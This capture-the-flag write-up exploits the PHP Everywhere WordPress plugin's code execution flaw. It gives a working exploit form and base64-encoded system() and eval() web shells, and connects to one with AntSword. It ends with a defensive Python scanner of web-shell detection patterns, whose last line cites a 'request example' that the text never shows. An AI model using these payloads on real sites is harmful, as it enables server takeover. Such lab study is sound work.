Table of contents
1. Topic
2. Construct exp to execute php
3. Ant sword connection
1. Topic
Introduction:
A remote code execution vulnerability in the PHP Everywhere plugin: any subscriber can send a request whose "shortcode" parameter carries a PHP Everywhere shortcode and thereby execute arbitrary PHP code on the site. PS: the environment has common usernames, low-privileged users and weak passwords.
Into the challenge:
We find a WordPress blog page.
Append wp-admin to the site URL to reach the WordPress admin login.
The credentials are test:test.
Logged in successfully:
2. Construct exp to execute php
After logging in we are a subscriber, which is a low-privilege role. We choose to edit the page source and insert the following form into any page:
Construct the exploit:
<form action="http://xxx.ichunqiu.com/wp-admin/admin-ajax.php" method="post">
<input name="action" value="parse-media-shortcode" />
<textarea name="shortcode">[php_everywhere] <?php file_put_contents("/var/www/html/system.php",base64_decode("PD9waHAgc3lzdGVtKCRfR0VUWzFdKTsgPz4=")); ?>[/php_everywhere]</textarea>
<input type="submit" value="Execute" />
</form>
Notes:
The URL is the domain of the target range at the time, http://xxx.ichunqiu.com.
The dropped web shell xxx.php can be given any name:
"/var/www/html/xxx.php",base64_decode("PD9waHAgc3lzdGVtKCRfR0VUWzFdKTsgPz4=")
<?php system($_GET[1]); ?> base64-encoded is PD9waHAgc3lzdGVtKCRfR0VUWzFdKTsgPz4=
Open the F12 developer tools.
Click the element-picker (cursor) icon in the upper-left corner to enable element inspection:
Hover over the page to find the location of the element in the source:
Right-click and choose Edit as HTML:
Ctrl+A to select all.
Paste the form in directly:
Then click on a blank area of the page.
The page will now look like the figure:
Click Execute to upload:
Our web shell was uploaded successfully:
The URL now looks like this:
Append xxx.php?1=cat /flag directly after the root URL http://xxx.ichunqiu.com/:
flag{0d0bd090-dee5-48ba-9f57-d8bed09876a9}
3. Ant sword connection
Construct a one-line web shell and connect to it:
<?php @eval($_POST['pass']);?> after base64:
PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ10pOz8+
Upload it in the same way:
Success:
Connect with AntSword:
View the flag in the root directory:
Get the flag:
flag{0d0bd090-dee5-48ba-9f57-d8bed09876a9}
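Both web shells used in this writeup are one-liners that pass a request parameter straight into system() or eval(). On the defensive side, such files are cheap to find on disk: they are short, live in a writable part of the webroot, and contain a command-execution or code-evaluation function fed directly from a PHP superglobal. The scanner below is an added example, not code from the writeup or from any product; it builds a constructed temporary webroot containing one benign file and the two shell bodies shown above, then walks it and reports which indicator matched each PHP file. The indicator names are my own.

```python
import os
import re
import tempfile

# Indicator patterns for PHP one-liner web shells. The two shells in this
# writeup, system($_GET[1]) and @eval($_POST['pass']), match the first two.
SHELL_INDICATORS = {
    "exec_from_request": re.compile(
        r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b",
        re.IGNORECASE,
    ),
    "eval_from_request": re.compile(
        r"\beval\s*\(\s*(base64_decode\s*\(\s*)?\$_(GET|POST|REQUEST|COOKIE)\b", re.IGNORECASE
    ),
    "assert_from_request": re.compile(
        r"\bassert\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.IGNORECASE
    ),
    "encoded_stage": re.compile(
        r"\beval\s*\(\s*(gzinflate|str_rot13|base64_decode)\s*\(", re.IGNORECASE
    ),
}

PHP_EXTENSIONS = (".php", ".phtml", ".php5", ".inc")


def scan_php_source(source: str) -> list[str]:
    """Return the sorted indicator names that match one PHP source text."""
    return sorted(name for name, rx in SHELL_INDICATORS.items() if rx.search(source))


def scan_tree(root: str) -> dict[str, list[str]]:
    """Walk a webroot and map each flagged PHP file (relative path) to its indicators."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for filename in files:
            if not filename.lower().endswith(PHP_EXTENSIONS):
                continue
            path = os.path.join(dirpath, filename)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    indicators = scan_php_source(fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the whole scan
            if indicators:
                hits[os.path.relpath(path, root)] = indicators
    return hits


def build_demo_webroot() -> str:
    """Create a constructed webroot: one clean file, one stylesheet, and the two shells above."""
    root = tempfile.mkdtemp(prefix="webroot_")
    samples = {
        "index.php": "<?php\n// constructed benign front controller\nrequire __DIR__ . '/wp-blog-header.php';\n",
        "system.php": "<?php system($_GET[1]); ?>",
        "shell.php": "<?php @eval($_POST['pass']);?>",
        "style.css": "body { color: #333; }",
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


def demo() -> dict[str, list[str]]:
    """Build the constructed webroot, scan it, and return the findings."""
    return scan_tree(build_demo_webroot())


if __name__ == "__main__":
    for path, indicators in sorted(demo().items()):
        print(f"{path}: {', '.join(indicators)}")
```

Pattern matching catches the plain one-liners seen here; obfuscated shells need the decode-and-rescan approach from the request example and, more reliably, a file-integrity baseline so that any new PHP file under the webroot is itself the alert, whatever it contains.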